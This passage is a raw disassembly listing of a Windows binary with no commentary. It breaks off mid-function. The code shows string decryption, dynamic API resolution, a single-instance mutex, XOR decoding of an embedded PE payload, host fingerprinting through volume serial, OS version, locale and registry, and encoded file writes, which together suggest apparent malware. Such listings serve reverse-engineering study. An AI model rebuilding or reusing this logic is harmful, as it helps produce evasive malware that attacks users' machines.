movsx ebx, word_44C174
add edi, ebx
sub edi, 0Ah
push edi
call ds:dword_44A64C ; CreateWindowExA
mov [ebp+var_25C], eax
push 1
push [ebp+var_130]
push 30h
push eax
call ds:dword_446014 ; SendMessageA
push offset dword_44CF18
call sub_43E507
mov [ebp+var_2E0], eax
push offset word_44CEFE
call sub_43E507
add esp, 18h
mov [ebp+var_2E4], eax
push 0
push [ebp+var_10C]
push 0
mov eax, 30h
mul esi
mov [ebp+var_2E8], eax
mov edi, eax
push ds:dword_44937C[edi]
movsx edi, word_44C150
mov ebx, dword_44C288
lea edi, [edi+ebx+9]
push edi
mov edi, dword_44C1E4
add edi, 97h
push edi
mov edi, dword_44C1B0
add edi, 0F1h
add edi, dword_44C278
mov ebx, dword_44C198
add ebx, 1Eh
movsx edx, word_44C1E0
add ebx, edx
sub edi, ebx
push edi
movsx edi, word_44C0D0
add edi, 3
push edi
push 50800000h
mov edi, [ebp+var_2E4]
push edi
mov edi, [ebp+var_2E0]
push edi
mov edi, dword_44C17C
sub edi, 5
push edi
call ds:dword_44A64C ; CreateWindowExA
mov edi, eax
mov eax, 30h
mul esi
mov [ebp+var_2EC], eax
mov ebx, eax
mov ds:dword_44938C[ebx], edi
push 1
push [ebp+var_130]
mov eax, 30h
push 30h
mul esi
mov [ebp+var_2F0], eax
push ds:dword_44938C[eax]
call ds:dword_446014 ; SendMessageA
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_2F4], eax
mov [ebp+var_2F8], eax
push ds:dword_449380[eax]
call ds:dword_44B628 ; GetWindowLongA
mov edi, [ebp+var_2F8]
mov ds:dword_449390[edi], eax
push offset sub_4419F6
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_2FC], eax
push ds:dword_449380[eax]
call ds:dword_4485FC ; SetWindowLongA
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_300], eax
mov [ebp+var_304], eax
push ds:dword_449384[eax]
call ds:dword_44B628 ; GetWindowLongA
mov edi, [ebp+var_304]
mov ds:dword_449394[edi], eax
push offset sub_4419F6
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_308], eax
push ds:dword_449384[eax]
call ds:dword_4485FC ; SetWindowLongA
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_30C], eax
mov [ebp+var_310], eax
push ds:dword_449388[eax]
call ds:dword_44B628 ; GetWindowLongA
mov edi, [ebp+var_310]
mov ds:dword_449398[edi], eax
push offset sub_4419F6
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_314], eax
push ds:dword_449388[eax]
call ds:dword_4485FC ; SetWindowLongA
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_318], eax
mov [ebp+var_31C], eax
push ds:dword_44937C[eax]
call ds:dword_44B628 ; GetWindowLongA
mov edi, [ebp+var_31C]
mov ds:dword_44939C[edi], eax
push offset sub_4419F6
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_320], eax
push ds:dword_44937C[eax]
call ds:dword_4485FC ; SetWindowLongA
mov eax, 30h
mul esi
mov [ebp+var_324], eax
push ds:dword_449380[eax]
call ds:dword_448A40 ; SetFocus
loc_440BBA: ; CODE XREF: sub_43FB8B+10�j
; sub_43FB8B+21�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_43FB8B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_440BBF proc near ; DATA XREF: .data:0044C35C�o
push ebp
mov ebp, esp
mov eax, dword_44C20C
add eax, dword_44C198
sub eax, 8
cmp ds:dword_44B784, eax
jbe short loc_440BE3
push offset dword_44B784
call ds:dword_446010 ; InterlockedDecrement
loc_440BE3: ; CODE XREF: sub_440BBF+17�j
mov eax, ds:dword_44B784
pop ebp
retn 4
sub_440BBF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_440BEC proc near ; DATA XREF: sub_440C0A+16D�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push edi
mov eax, [ebp+arg_4]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_448618 ; DefWindowProcA
pop edi
pop ebp
retn 10h
sub_440BEC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_440C0A proc near ; DATA XREF: sub_44283E+C�o
; sub_44283E+299�o
var_15C = dword ptr -15Ch
var_158 = dword ptr -158h
var_154 = dword ptr -154h
var_150 = byte ptr -150h
var_14C = dword ptr -14Ch
var_148 = dword ptr -148h
var_144 = byte ptr -144h
var_143 = byte ptr -143h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
push ebp
mov ebp, esp
sub esp, 15Ch
push ebx
push esi
push edi
call sub_43BDDE
call sub_43D4B3
call sub_43D3CC
call sub_43B4DD
call sub_442D4B
call sub_43B69E
call sub_43E26E
call sub_43E1C6
call sub_43B7A3
mov esi, eax
loc_440C45: ; CODE XREF: sub_440C0A+97�j
call sub_43B6F6
mov edx, eax
mov [ebp+var_144], dl
movzx eax, [ebp+var_144]
mov edx, dword_44C0A0
sub edx, 2
cmp eax, edx
jnz short loc_440C7D
movsx eax, word_44C1DC
add eax, dword_44C194
sub eax, 9
push eax
call ds:dword_44B664 ; ExitThread
loc_440C7D: ; CODE XREF: sub_440C0A+5A�j
movzx eax, [ebp+var_144]
mov edx, dword_44C1F8
sub edx, 2
cmp eax, edx
jnz short loc_440CA3
mov eax, dword_44C228
add eax, 61h
push eax
call ds:dword_44B630
pop ecx
jmp short loc_440C45
; ---------------------------------------------------------------------------
loc_440CA3: ; CODE XREF: sub_440C0A+85�j
or esi, esi
jnz loc_440D5D
push offset byte_44CEF3
call sub_43E507
mov [ebp+var_154], eax
push offset byte_44CEE9
call sub_43E507
push eax
mov edx, [ebp+var_154]
push edx
lea edx, [ebp+var_143]
push edx
call ds:dword_44B634
lea eax, [ebp+var_143]
push eax
push 0
push 0
call ds:dword_44B61C ; CreateMutexA
mov ebx, eax
push offset byte_44CEDD
call sub_43E507
mov [ebp+var_158], eax
push offset byte_44CED3
call sub_43E507
mov edx, dword_44C234
add edx, dword_44C23C
sub edx, 7
push edx
push eax
mov edx, [ebp+var_158]
push edx
lea edx, [ebp+var_143]
push edx
call ds:dword_44B634
add esp, 2Ch
lea eax, [ebp+var_143]
push eax
push 0
push 0
call ds:dword_44B61C ; CreateMutexA
mov ebx, eax
or ebx, ebx
jnz short loc_440D5D
movsx eax, word_44C0CC
add eax, dword_44C138
sub eax, 6
push eax
call ds:dword_44B664 ; ExitThread
loc_440D5D: ; CODE XREF: sub_440C0A+9B�j
; sub_440C0A+13A�j
push 0
call ds:dword_4485E8 ; GetModuleHandleA
mov edi, eax
push offset byte_44CEC9
call sub_43E507
mov [ebp+var_20], eax
mov [ebp+var_34], edi
lea eax, sub_440BEC
mov [ebp+var_40], eax
push 7F00h
push 0
call ds:dword_449220 ; LoadCursorA
mov [ebp+var_2C], eax
push 7F03h
push 0
call ds:dword_44B620 ; LoadIconA
mov [ebp+var_30], eax
and [ebp+var_24], 0
push 0
call ds:dword_447120 ; GetStockObject
mov [ebp+var_28], eax
mov [ebp+var_44], 3
mov eax, dword_44C1C4
add eax, dword_44C19C
sub eax, 0Bh
mov [ebp+var_3C], eax
mov eax, dword_44C108
movsx edx, word_44C0FC
add eax, edx
sub eax, 0Ch
mov [ebp+var_38], eax
lea eax, [ebp+var_44]
push eax
call ds:dword_4480DC ; RegisterClassA
push offset byte_44CEBF
call sub_43E507
mov [ebp+var_15C], eax
push offset byte_44CEB5
call sub_43E507
push 0
push edi
push 0
push 0
mov edx, dword_44C228
add edx, dword_44C1D8
sub edx, 0Ch
push edx
movsx edx, word_44C124
sub edx, 6
push edx
mov edx, dword_44C214
mov ecx, edx
sub ecx, 9
push ecx
movsx ecx, word_44C0E0
dec ecx
push ecx
push 0CA0000h
push eax
mov ecx, [ebp+var_15C]
push ecx
mov ecx, dword_44C254
add ecx, edx
mov edx, ecx
sub edx, 12h
push edx
call ds:dword_44A64C ; CreateWindowExA
mov ds:dword_448610, eax
lea eax, [ebp+var_148]
push eax
push edi
call sub_441122
add esp, 14h
mov [ebp+var_14C], eax
mov ds:off_44B610, eax
mov eax, [ebp+var_148]
mov ds:dword_448614, eax
or esi, esi
jnz short loc_440EA0
call sub_43BB69
mov eax, dword_44C090
add eax, dword_44C110
sub eax, 8
mov ds:dword_44B638, eax
jmp short loc_440EB9
; ---------------------------------------------------------------------------
loc_440EA0: ; CODE XREF: sub_440C0A+27A�j
movsx eax, word_44C0C0
mov edx, dword_44C220
lea eax, [eax+edx+3A92h]
mov ds:dword_44B638, eax
loc_440EB9: ; CODE XREF: sub_440C0A+294�j
lea eax, [ebp+var_150]
push eax
mov eax, dword_44C1D8
add eax, dword_44C0DC
sub eax, 0Ch
push eax
push 0
push offset sub_43B9CB
mov eax, dword_44C21C
add eax, dword_44C224
sub eax, 0Dh
push eax
push 0
call ds:dword_44BB90 ; CreateThread
push eax
call ds:dword_44A654 ; CloseHandle
or esi, esi
jnz short loc_440F18
call sub_43BB7B
call sub_43F6B1
jmp short loc_440F18
; ---------------------------------------------------------------------------
loc_440F04: ; CODE XREF: sub_440C0A+330�j
lea eax, [ebp+var_1C]
push eax
call ds:dword_44B77C ; TranslateMessage
lea eax, [ebp+var_1C]
push eax
call ds:dword_446050 ; DispatchMessageA
loc_440F18: ; CODE XREF: sub_440C0A+2EC�j
; sub_440C0A+2F8�j
movsx eax, word_44C174
sub eax, 7
push eax
mov eax, dword_44C134
sub eax, 8
push eax
push 0
lea eax, [ebp+var_1C]
push eax
call ds:dword_44A630 ; GetMessageA
or eax, eax
jnz short loc_440F04
pop edi
pop esi
pop ebx
leave
retn 4
sub_440C0A endp
; =============== S U B R O U T I N E =======================================
sub_440F43 proc near ; DATA XREF: .data:0044C3A4�o
mov eax, 80004001h
retn 8
sub_440F43 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_440F4B proc near ; DATA XREF: .data:0044C358�o
push ebp
mov ebp, esp
push offset dword_44B784
call ds:dword_448A3C ; InterlockedIncrement
mov eax, ds:dword_44B784
pop ebp
retn 4
sub_440F4B endp
; =============== S U B R O U T I N E =======================================
sub_440F62 proc near ; CODE XREF: sub_44283E+25C�p
push edi
push offset byte_44CEA7
call sub_43E507
pop ecx
push eax
call ds:dword_4485E8 ; GetModuleHandleA
mov dword_44C298, eax
test eax, eax
jnz short loc_440F95
push offset byte_44CE99
call sub_43E507
pop ecx
push eax
call ds:dword_449244 ; LoadLibraryA
mov dword_44C298, eax
loc_440F95: ; CODE XREF: sub_440F62+1A�j
push offset byte_44CE8F
call sub_43E507
push eax
push dword_44C298
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_44B630, eax
push offset dword_44CE84
call sub_43E507
push eax
push dword_44C298
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_446030, eax
push offset dword_44CE7C
call sub_43E507
push eax
push dword_44C298
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_446054, eax
push offset dword_44CE74
call sub_43E507
push eax
push dword_44C298
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_448A38, eax
push offset word_44CE6A
call sub_43E507
push eax
push dword_44C298
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_448A2C, eax
push offset dword_44CE60
call sub_43E507
push eax
push dword_44C298
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_44B64C, eax
push offset word_44CE56
call sub_43E507
push eax
push dword_44C298
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_44A638, eax
push offset dword_44CE4C
call sub_43E507
push eax
push dword_44C298
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_44A644, eax
push offset dword_44CE44
call sub_43E507
push eax
push dword_44C298
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_44BBAC, eax
push offset byte_44CE3B
call sub_43E507
push eax
push dword_44C298
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_44B600, eax
push offset byte_44CE31
call sub_43E507
push eax
push dword_44C298
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_446020, eax
push offset word_44CE26
call sub_43E507
push eax
push dword_44C298
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_44B634, eax
push offset word_44CE1A
call sub_43E507
push eax
push dword_44C298
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_44924C, eax
push offset dword_44CE10
call sub_43E507
add esp, 38h
push eax
push dword_44C298
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_4481F4, eax
pop edi
retn
sub_440F62 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_441122 proc near ; CODE XREF: sub_440C0A+25A�p
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
mov eax, [ebp+arg_0]
mov esi, [eax+3Ch]
mov ecx, esi
add ecx, eax
mov eax, [ecx+28h]
mov edx, [ebp+arg_0]
lea esi, [eax+edx+0Dh]
movzx eax, byte ptr [esi]
xor eax, 4Dh
mov [ebp+var_1], al
movzx eax, byte ptr [esi+1]
mov edx, dword_44C18C
add edx, 200h
mov ebx, eax
imul ebx, edx
mov eax, dword_44C0EC
mov ecx, eax
add ecx, dword_44C09C
sub ecx, 7
jmp short loc_44117A
; ---------------------------------------------------------------------------
loc_44116C: ; CODE XREF: sub_441122+5A�j
movzx eax, byte ptr [esi+ecx]
movzx edx, [ebp+var_1]
xor eax, edx
mov [esi+ecx], al
inc ecx
loc_44117A: ; CODE XREF: sub_441122+48�j
cmp ecx, ebx
jb short loc_44116C
mov eax, [ebp+arg_4]
mov [eax], ebx
mov eax, esi
pop esi
pop ebx
leave
retn
sub_441122 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_441189 proc near ; CODE XREF: sub_43BB7B+AB�p
var_1AC = dword ptr -1ACh
var_1A8 = byte ptr -1A8h
var_1A4 = dword ptr -1A4h
var_1A0 = dword ptr -1A0h
var_19C = byte ptr -19Ch
var_198 = dword ptr -198h
var_193 = dword ptr -193h
var_18F = dword ptr -18Fh
var_18B = dword ptr -18Bh
var_187 = dword ptr -187h
var_183 = dword ptr -183h
var_FF = byte ptr -0FFh
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1ACh
push esi
push edi
mov edi, [ebp+arg_0]
mov byte ptr [edi], 0
mov [ebp+var_193], 94h
lea eax, [ebp+var_193]
push eax
call ds:dword_44BB98 ; GetVersionExA
cmp [ebp+var_183], 1
jnz short loc_4411CF
push offset word_44CE0A
call sub_43E507
push eax
push edi
call ds:dword_446020
add esp, 0Ch
loc_4411CF: ; CODE XREF: sub_441189+2F�j
cmp [ebp+var_183], 2
jnz short loc_4411ED
push offset dword_44CE04
call sub_43E507
push eax
push edi
call ds:dword_44B634
add esp, 0Ch
loc_4411ED: ; CODE XREF: sub_441189+4D�j
push offset dword_44CDF8
call sub_43E507
push [ebp+var_187]
push [ebp+var_18B]
push [ebp+var_18F]
push eax
lea esi, [ebp+var_FF]
push esi
call ds:dword_44B634
lea eax, [ebp+var_FF]
push eax
push edi
call ds:dword_446020
push offset byte_44CDF1
call sub_43E507
mov esi, dword_44C244
sub esi, 4
push esi
push 0
lea esi, [ebp+var_19C]
push esi
lea esi, [ebp+var_19C]
push esi
lea esi, [ebp+var_198]
push esi
push 0FFh
lea esi, [ebp+var_FF]
push esi
push eax
call ds:dword_44B614 ; GetVolumeInformationA
push offset byte_44CDE9
call sub_43E507
push [ebp+var_198]
push eax
lea esi, [ebp+var_FF]
push esi
call ds:dword_44B634
lea eax, [ebp+var_FF]
push eax
push edi
call ds:dword_446020
push 0FFh
lea eax, [ebp+var_FF]
push eax
movsx eax, word_44C24C
movsx edx, word_44C1E0
add eax, edx
sub eax, 9
push eax
push 400h
call ds:dword_4485F8 ; GetLocaleInfoA
lea eax, [ebp+var_FF]
push eax
push edi
call ds:dword_446020
push offset dword_44CDE4
call sub_43E507
push eax
push edi
call ds:dword_446020
mov [ebp+var_1A0], 0FFh
push offset byte_44CDB7
call sub_43E507
mov [ebp+var_1AC], eax
push offset asc_44CDAA ; "\t"
call sub_43E507
lea esi, [ebp+var_1A8]
push esi
lea esi, [ebp+var_1A0]
push esi
lea esi, [ebp+var_FF]
push esi
push eax
mov esi, [ebp+var_1AC]
push esi
push 80000002h
call sub_43E3CE
add esp, 70h
mov [ebp+var_1A4], eax
mov eax, dword_44C15C
sub eax, 8
cmp [ebp+var_1A4], eax
jnz short loc_44134F
lea eax, [ebp+var_FF]
push eax
push edi
call ds:dword_446020
add esp, 8
loc_44134F: ; CODE XREF: sub_441189+1B3�j
pop edi
pop esi
leave
retn
sub_441189 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_441353 proc near ; CODE XREF: sub_43BB7B+C7�p
; sub_43CF47+3D1�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
mov esi, dword_44C1D4
sub esi, 2
jmp short loc_44139B
; ---------------------------------------------------------------------------
loc_441367: ; CODE XREF: sub_441353+4B�j
call ds:dword_44BBAC
movsx edi, word_44C22C
mov edx, dword_44C214
lea edi, [edi+edx+51h]
mov edx, 10624DD3h
push ecx
mov ecx, eax
imul edx
sar edx, 7
sar ecx, 1Fh
sub edx, ecx
mov eax, edx
pop ecx
add edi, eax
mov edx, edi
mov [ebx+esi], dl
inc esi
loc_44139B: ; CODE XREF: sub_441353+12�j
cmp esi, [ebp+arg_4]
jl short loc_441367
mov eax, [ebp+arg_4]
mov edx, dword_44C190
sub edx, 2
mov [ebx+eax], dl
mov eax, ebx
pop edi
pop esi
pop ebx
pop ebp
retn
sub_441353 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4413B6 proc near ; DATA XREF: sub_43BB7B+85�o
; sub_43BB7B+90�o
var_118 = dword ptr -118h
var_114 = dword ptr -114h
var_110 = byte ptr -110h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 118h
push ebx
push esi
push edi
movsx eax, word_44C1F0
sub eax, 3
mov edx, [ebp+arg_0]
cmp byte ptr [edx+eax], 4Bh
jnz short loc_4413E8
push offset dword_4480F0
lea eax, [ebp+var_110]
push eax
call sub_444F8C
jmp short loc_4413F9
; ---------------------------------------------------------------------------
loc_4413E8: ; CODE XREF: sub_4413B6+1D�j
push offset dword_449260
lea eax, [ebp+var_110]
push eax
call sub_444F8C
loc_4413F9: ; CODE XREF: sub_4413B6+30�j
push 0
movsx eax, word_44C160
dec eax
push eax
push 4
push 0
mov eax, dword_44C18C
movsx edx, word_44C240
add eax, edx
sub eax, 2
push eax
push 40000000h
lea eax, [ebp+var_110]
push eax
call ds:dword_44B788 ; CreateFileA
mov [ebp+var_8], eax
push 2
push 0
mov eax, dword_44C1A0
add eax, dword_44C210
sub eax, 4
push eax
push [ebp+var_8]
call ds:dword_44BB9C ; SetFilePointer
push offset word_44CDA2
call sub_43E507
pop ecx
push 0
lea edx, [ebp+var_C]
push edx
movsx edx, word_44C0B0
movsx ecx, word_44C1B4
add edx, ecx
sub edx, 7
push edx
push eax
push [ebp+var_8]
call ds:dword_44BB8C ; WriteFile
push 493E0h
push 40h
call ds:dword_448A34 ; LocalAlloc
mov ebx, eax
push 61A80h
push 40h
call ds:dword_448A34 ; LocalAlloc
mov esi, eax
mov eax, dword_44C1BC
sub eax, 9
mov edx, [ebp+arg_0]
cmp byte ptr [edx+eax], 4Bh
jnz short loc_4414B6
mov eax, [ebp+arg_0]
inc eax
push eax
push ebx
call sub_444F8C
jmp short loc_4414BF
; ---------------------------------------------------------------------------
loc_4414B6: ; CODE XREF: sub_4413B6+F1�j
push [ebp+arg_0]
push ebx
call sub_444F8C
loc_4414BF: ; CODE XREF: sub_4413B6+FE�j
mov ecx, ebx
or eax, 0FFFFFFFFh
loc_4414C4: ; CODE XREF: sub_4413B6+113�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4414C4
mov [ebp+var_4], eax
mov edi, dword_44C28C
sub edi, 6
jmp short loc_4414FF
; ---------------------------------------------------------------------------
loc_4414D9: ; CODE XREF: sub_4413B6+14C�j
movzx eax, byte ptr [ebx+edi]
mov [ebp+var_114], eax
mov eax, edi
mul edi
mov [ebp+var_118], eax
mov eax, [ebp+var_114]
mov edx, [ebp+var_118]
add eax, edx
mov [ebx+edi], al
inc edi
loc_4414FF: ; CODE XREF: sub_4413B6+121�j
cmp edi, [ebp+var_4]
jb short loc_4414D9
mov eax, dword_44C0C4
add eax, 61A79h
push eax
push esi
push [ebp+var_4]
push ebx
call sub_43CE20
add esp, 10h
movsx eax, word_44C260
mov edi, eax
add edi, dword_44C224
sub edi, 7
jmp short loc_441545
; ---------------------------------------------------------------------------
loc_441530: ; CODE XREF: sub_4413B6+19D�j
cmp byte ptr [esi+edi], 2Bh
jnz short loc_44153A
mov byte ptr [esi+edi], 28h
loc_44153A: ; CODE XREF: sub_4413B6+17E�j
cmp byte ptr [esi+edi], 3Dh
jnz short loc_441544
mov byte ptr [esi+edi], 29h
loc_441544: ; CODE XREF: sub_4413B6+188�j
inc edi
loc_441545: ; CODE XREF: sub_4413B6+178�j
mov ecx, esi
or eax, 0FFFFFFFFh
loc_44154A: ; CODE XREF: sub_4413B6+199�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_44154A
cmp edi, eax
jb short loc_441530
mov eax, dword_44C12C
sub eax, 8
mov edx, [ebp+arg_0]
cmp byte ptr [edx+eax], 4Bh
jnz short loc_441596
push offset byte_44CD9D
call sub_43E507
add esp, 4
push 0
lea edi, [ebp+var_C]
push edi
mov edi, dword_44C244
movsx edx, word_44C0B0
add edi, edx
sub edi, 0Ah
push edi
push eax
push [ebp+var_8]
call ds:dword_44BB8C ; WriteFile
loc_441596: ; CODE XREF: sub_4413B6+1AE�j
mov ecx, esi
or eax, 0FFFFFFFFh
loc_44159B: ; CODE XREF: sub_4413B6+1EA�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_44159B
push 0
lea edx, [ebp+var_C]
push edx
mov edx, dword_44C110
add edx, dword_44C238
sub edx, 4
mov edi, eax
add edi, edx
push edi
push esi
push [ebp+var_8]
call ds:dword_44BB8C ; WriteFile
push [ebp+var_8]
call ds:dword_44A654 ; CloseHandle
push ebx
call ds:dword_44861C ; LocalFree
push esi
call ds:dword_44861C ; LocalFree
pop edi
pop esi
pop ebx
leave
retn
sub_4413B6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4415E2 proc near ; CODE XREF: sub_43BB69+2�p
; sub_43BB69+9�p
var_104 = byte ptr -104h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 104h
push edi
lea eax, [ebp+var_104]
push eax
mov eax, dword_44C1D0
sub eax, 7
push eax
push 0
push [ebp+arg_0]
push 0
call ds:dword_448A44
mov edi, eax
or edi, edi
jnz short loc_44163A
push offset dword_44CD98
call sub_43E507
push eax
lea edi, [ebp+var_104]
push edi
call ds:dword_446020
push 1
push 43h
lea eax, [ebp+var_104]
push eax
call sub_43F357
add esp, 18h
loc_44163A: ; CODE XREF: sub_4415E2+2B�j
pop edi
leave
retn
sub_4415E2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_44163D proc near ; CODE XREF: sub_43B857+FC�p
; sub_43F6B1+17A�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push eax
push ebx
push esi
push edi
mov eax, dword_44C26C
movsx edx, word_44C118
mov esi, eax
add esi, edx
sub esi, 0Ch
lea eax, [ebp+var_4]
push eax
push offset dword_44DA38
mov eax, [ebp+arg_0]
push eax
mov ebx, [eax]
call dword ptr ds:0[ebx]
mov edi, eax
mov eax, dword_44C1D4
sub eax, 2
cmp edi, eax
jz short loc_441680
xor eax, eax
jmp short loc_4416DE
; ---------------------------------------------------------------------------
loc_441680: ; CODE XREF: sub_44163D+3D�j
lea eax, [ebp+var_8]
push eax
push [ebp+arg_8]
mov eax, [ebp+var_4]
push eax
mov ebx, [eax]
call dword ptr [ebx+10h]
mov edi, eax
mov eax, dword_44C0B8
sub eax, 3
cmp edi, eax
jnz short loc_4416D3
push [ebp+arg_C]
push [ebp+arg_4]
mov eax, [ebp+var_8]
push eax
mov ebx, [eax]
call dword ptr [ebx+14h]
mov edi, eax
mov eax, dword_44C1CC
add eax, dword_44C284
sub eax, 0Fh
cmp edi, eax
jnz short loc_4416CA
mov esi, dword_44C244
sub esi, 3
loc_4416CA: ; CODE XREF: sub_44163D+82�j
mov eax, [ebp+var_8]
push eax
mov ebx, [eax]
call dword ptr [ebx+8]
loc_4416D3: ; CODE XREF: sub_44163D+5F�j
mov eax, [ebp+var_4]
push eax
mov ebx, [eax]
call dword ptr [ebx+8]
mov eax, esi
loc_4416DE: ; CODE XREF: sub_44163D+41�j
pop edi
pop esi
pop ebx
leave
retn
sub_44163D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4416E3 proc near ; CODE XREF: sub_43FB8B+463�p
; sub_43FB8B+47F�p
var_FFF = byte ptr -0FFFh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 1000h
call sub_444F6C
push ebx
push esi
push edi
push 5
push [ebp+arg_0]
call ds:dword_446004 ; GetWindow
mov edi, eax
loc_441700: ; CODE XREF: sub_4416E3+7D�j
or edi, edi
jnz short loc_441708
xor eax, eax
jmp short loc_441762
; ---------------------------------------------------------------------------
loc_441708: ; CODE XREF: sub_4416E3+1F�j
push 0FFFh
lea eax, [ebp+var_FFF]
push eax
push edi
call ds:dword_447010 ; GetClassNameA
movsx eax, word_44C144
sub eax, 5
push eax
push [ebp+arg_4]
lea eax, [ebp+var_FFF]
push eax
call sub_43A4B5
add esp, 0Ch
movsx esi, word_44C124
movsx ebx, word_44C170
lea esi, [esi+ebx+0FFF7h]
cmp eax, esi
jz short loc_441755
mov eax, edi
jmp short loc_441762
; ---------------------------------------------------------------------------
loc_441755: ; CODE XREF: sub_4416E3+6C�j
push 2
push edi
call ds:dword_446004 ; GetWindow
mov edi, eax
jmp short loc_441700
; ---------------------------------------------------------------------------
loc_441762: ; CODE XREF: sub_4416E3+23�j
; sub_4416E3+70�j
pop edi
pop esi
pop ebx
leave
retn
sub_4416E3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_441767 proc near ; CODE XREF: sub_43A58C+209�p
; sub_43A58C+220�p ...
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
cmp dword_44C290, 0
jnz short loc_44178F
push offset dword_44BBC0
call ds:dword_447008 ; InitializeCriticalSection
mov dword_44C290, 1
loc_44178F: ; CODE XREF: sub_441767+11�j
mov esi, dword_44C1D8
sub esi, 3
movzx ebx, byte ptr [edi]
movzx edx, byte ptr [edi+2]
movzx edx, dx
shl edx, 8
or ebx, edx
movzx ebx, bx
movsx edx, word_44C0BC
sub edx, 7
imul ebx, edx
add esi, ebx
mov [ebp+var_4], si
movzx eax, [ebp+var_4]
mov edx, dword_44C0AC
add edx, 5
cmp eax, edx
jz loc_441852
push offset dword_44BBC0
call ds:dword_44B660 ; RtlEnterCriticalSection
mov eax, dword_44C110
inc eax
mov [ebp+var_2], ax
jmp short loc_44180D
; ---------------------------------------------------------------------------
loc_4417E9: ; CODE XREF: sub_441767+B0�j
movzx eax, [ebp+var_2]
add eax, edi
movsx edx, byte ptr [eax]
movsx ecx, byte ptr [edi+4]
xor edx, ecx
mov [eax], dl
movzx eax, [ebp+var_2]
mov edx, dword_44C09C
sub edx, 3
add eax, edx
mov [ebp+var_2], ax
loc_44180D: ; CODE XREF: sub_441767+80�j
movzx eax, [ebp+var_2]
movzx edx, [ebp+var_4]
cmp eax, edx
jl short loc_4417E9
mov eax, dword_44C1F8
sub eax, 3
mov edx, dword_44C258
sub edx, 2
mov [edi+eax], dl
mov eax, dword_44C21C
add eax, dword_44C114
sub eax, 0Eh
mov edx, dword_44C128
sub edx, 9
mov [edi+eax], dl
push offset dword_44BBC0
call ds:dword_44A650 ; RtlLeaveCriticalSection
loc_441852: ; CODE XREF: sub_441767+65�j
lea eax, [edi+6]
pop edi
pop esi
pop ebx
leave
retn
sub_441767 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_44185A proc near ; CODE XREF: sub_43D982+24�p
; sub_43F8DE+25�p ...
var_10C = dword ptr -10Ch
var_108 = byte ptr -108h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10Ch
push edi
mov edi, [ebp+arg_0]
push 104h
lea eax, [ebp+var_108]
push eax
call ds:dword_448600 ; GetSystemDirectoryA
mov eax, dword_44C14C
movsx edx, word_44C264
sub edx, 9
mov byte ptr [ebp+eax+var_10C+1], dl
push 104h
lea eax, [ebp+var_108]
push eax
lea eax, [ebp+var_4]
